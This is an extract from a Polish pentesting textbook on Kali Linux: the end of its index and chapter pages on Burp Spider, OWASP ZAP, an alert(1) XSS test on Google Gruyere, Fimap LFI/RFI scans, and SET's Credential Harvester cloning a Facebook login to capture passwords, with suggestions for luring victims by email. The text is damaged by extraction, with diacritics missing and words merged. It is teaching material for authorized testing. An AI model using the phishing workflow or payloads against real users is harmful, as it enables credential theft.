Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
242
Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
243
Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter
Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza
Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie
Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom
Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
244
Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
245
OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)
ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej
Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3
1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption
4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network
7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP
8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych
Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
246
Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron
ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji
W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere
Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz
pobra go na swoacutej komputer lokalny
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
247
Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334
Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL
Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid
Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
248
Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED
Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)
httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt
Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS
W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
249
Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP
Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji
Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
250
Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4
Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem
Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET
Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie
Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity
bloggercom)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
251
1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks
2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method
Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania
Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y
W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
252
Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook
Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony
Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)
Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-
myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)
Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
253
Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
